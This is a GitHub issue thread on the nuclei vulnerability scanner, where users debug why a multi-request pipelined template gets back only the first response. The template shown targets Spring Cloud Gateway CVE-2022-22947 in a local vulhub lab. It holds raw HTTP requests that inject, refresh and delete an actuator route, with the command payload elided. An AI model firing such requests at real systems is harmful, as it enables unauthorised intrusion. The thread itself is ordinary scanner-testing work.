projectdiscovery / nuclei

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
https://docs.projectdiscovery.io/tools/nuclei
MIT License

[bug] Send multiple HTTP packets at a time, unable to get the return data #2099

Closed hktalent closed 2 years ago

hktalent commented 2 years ago

1. Burp send is OK


2. Send multiple HTTP packets at a time, unable to get the return data

How to test:

git clone https://github.com/vulhub/vulhub
cd vulhub/spring/CVE-2022-22947
docker-compose up -d

id: CVE-2022-22947

info:
  name: spring_cloud_gateway_CVE_2022_22947
  author: 51pwn
  severity: high
  reference:
    - https://github.com/hktalent
    - https://51pwn.com
  tags: spring,CVE-2022-22947

requests:
  - raw:
      - |+
        POST /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Pragma:no-cache
        Content-Type: application/json
        Connection: keep-alive
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Content-Length: 333

        {
          "id": "hacktest",
          "filters": [{
            "name": "AddResponseHeader",
            "args": {"name": "Result","value": "....."}
            }],
          "uri": "https://51pwn.com",
          "order": 0
        }
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        GET /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        DELETE /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: close
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      # end payload
    unsafe: true
    # matchers-condition: or
    matchers:
      - type: regex
        regex:
          - "(uid=.{3,})"
    extractors:
      - type: regex
        part: body
        name: xxxx
        regex:
          - "(uid=[^\\n]{10,})"

Send multiple HTTP packets at a time, unable to get the return data

geeknik commented 2 years ago

Maybe not a bug? Try this edit and let me know if it fixes your problem.

id: CVE-2022-22947

info:
  name: spring_cloud_gateway_CVE_2022_22947
  author: 51pwn
  severity: high
  reference:
    - https://github.com/hktalent
    - https://51pwn.com
  tags: spring,CVE-2022-22947

requests:
  - raw:
      - |+
        POST /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Pragma:no-cache
        Content-Type: application/json
        Connection: keep-alive
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Content-Length: 333

        {
          "id": "hacktest",
          "filters": [{
            "name": "AddResponseHeader",
            "args": {"name": "Result","value": "....."}
            }],
          "uri": "https://51pwn.com",
          "order": 0
        }

      - |+
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        GET /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        DELETE /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: close
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

    # end payload
    cookie-reuse: true
    req-condition: true
    unsafe: true
    # matchers-condition: or
    matchers:
      - type: regex
        regex:
          - "(uid=.{3,})"
    extractors:
      - type: regex
        part: body
        name: xxxx
        regex:
          - "(uid=[^\\n]{10,})"

hktalent commented 2 years ago

@ehsandeep @geeknik thanks, I know it is possible to split multiple requests. The case does not need cookies. Although it has not been resolved, thank you very much.

I want to use the HTTP protocol feature to send at one time to reduce network interaction

Using -debug, it is found that the packets can be sent correctly, but only the first request's data is received:

[DBG] [CVE-2022-22947] Dumped HTTP response http://127.0.0.1:8080

HTTP/1.1 201 Created
Location: /routes/hack_51pwn_com
content-length: 0
Content-Length: 0

[INF] No results found. Better luck next time!
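What the -debug output above shows, as an added illustration that is not nuclei's own code: Go reading back-to-back HTTP/1.1 responses from one buffered connection. A client that reads a single response and stops sees only the 201; reading one response per request sent, from the same reader, recovers the rest, and a server that does not pipeline leaves the next read with an error. The stream is constructed, and the names pipelinedStream, readFirstOnly and readPipelined are assumed here.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"net/http"
)

// Constructed sample (not captured from a real server): two HTTP/1.1 responses as they
// arrive back-to-back on one keep-alive connection after two pipelined requests.
const firstResponse = "HTTP/1.1 201 Created\r\nLocation: /routes/example\r\nContent-Length: 0\r\n\r\n"
const secondResponse = "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: 13\r\n\r\n{\"ok\": true}\n"
const pipelinedStream = firstResponse + secondResponse

// readFirstOnly behaves like a client that reads exactly one response and stops: the second one is never consumed.
func readFirstOnly(stream string) (int, error) {
	resp, err := http.ReadResponse(bufio.NewReader(bytes.NewReader([]byte(stream))), nil)
	if err != nil {
		return 0, err
	}
	return resp.StatusCode, nil
}

// readPipelined drains one response per request sent, in order, from the same buffered
// reader. A server that does not pipeline yields fewer responses and an error on the next read.
func readPipelined(stream string, nRequests int) ([]int, []string, error) {
	r := bufio.NewReader(bytes.NewReader([]byte(stream)))
	codes, bodies := []int{}, []string{}
	for i := 0; i < nRequests; i++ {
		resp, err := http.ReadResponse(r, nil)
		if err != nil {
			return codes, bodies, err
		}
		body, err := io.ReadAll(resp.Body) // drain fully before parsing the next header
		resp.Body.Close()
		if err != nil {
			return codes, bodies, err
		}
		codes = append(codes, resp.StatusCode)
		bodies = append(bodies, string(body))
	}
	return codes, bodies, nil
}

func main() {
	fmt.Println(readFirstOnly(pipelinedStream))     // 201 <nil>
	fmt.Println(readPipelined(pipelinedStream, 2)) // statuses [201 200] and both bodies
}
```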

hktalent commented 2 years ago

HTTP pipelining reference

geeknik commented 2 years ago

https://nuclei.projectdiscovery.io/templating-guide/protocols/http/#pipelining

hktalent commented 2 years ago

@geeknik use

pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000

Same, it cannot work.

ehsandeep commented 2 years ago

@hktalent From https://en.wikipedia.org/wiki/HTTP_pipelining

Despite this requirement, many legacy HTTP/1.1 servers do not support pipelining correctly, forcing most HTTP clients to not use HTTP pipelining in practice.

It's a feature that depends on the server to support it. nuclei does support sending pipelined requests as mentioned above, but it's not usable unless the server supports it, and most probably you are going to miss lots of vulnerable targets this way.

Closing the issue as this is not a bug.

hktalent commented 2 years ago

@ehsandeep thanks, but using Burp is OK. This indicates that the server supports it, but nuclei only gets the return of the first request.